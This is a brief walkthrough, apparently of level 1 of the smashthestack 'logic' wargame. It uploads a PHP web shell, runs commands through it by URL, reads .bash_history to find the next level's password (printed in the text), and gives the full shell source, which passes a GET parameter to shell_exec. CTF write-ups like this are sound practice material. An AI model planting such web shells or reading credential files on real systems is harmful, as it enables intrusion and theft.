Getting Started
The first level of this game is accessible via the web here: Level 1.After finishing the first level you will need to connect to the server via ssh with the following command:
ssh -l level# logic.smashthestack.org -p2227
Replace "level#" with the correct level you are currently on, ex. level3
http://logic.smashthestack.org:8181/index.html
上传一个Php shell sim_ph_shell.php
http://logic.smashthestack.org:8181/uploads/sim_ph_shell.php?cmd=pwd
cmd = pwd/srv/www/level1/uploads
http://logic.smashthestack.org:8181/uploads/sim_ph_shell.php?cmd=ls -al /home/level1/
cmd = ls -al /home/level1/total 60
drwxr-xr-x 2 level1 level1 4096 Oct 24 14:14 .
drwx--x--x 22 root root 4096 Jun 14 18:57 ..
-rw-r--r-- 1 root level1 43 Sep 19 2010 .bash_history
-rwxr-x--- 1 root level1 1708 Feb 5 2010 .bash_profile
-rw-rw-r-- 1 root root 55 Oct 16 22:02 README
-rw-r--r-- 1 level1 level1 37710 Oct 31 14:58 tags
http://logic.smashthestack.org:8181/uploads/sim_ph_shell.php?cmd=cat /home/level1/README
cmd = cat /home/level1/READMEWhat you seek is very near. Look no further than home.
http://logic.smashthestack.org:8181/uploads/sim_ph_shell.php?cmd=cat /home/level1/tags
http://logic.smashthestack.org:8181/uploads/sim_ph_shell.php?cmd=cat /home/level1/.bash_history
cmd = cat /home/level1/.bash_historyls
who
cat README
ach3sa6F
clear
su level2
password is :ach3sa6F for next level
webshell content:
<?php
echo "<pre>\n";
echo "cmd = ".$_GET['cmd'];
$cmd = $_GET['cmd'];
echo shell_exec((string)$cmd);
echo "</pre>";
?>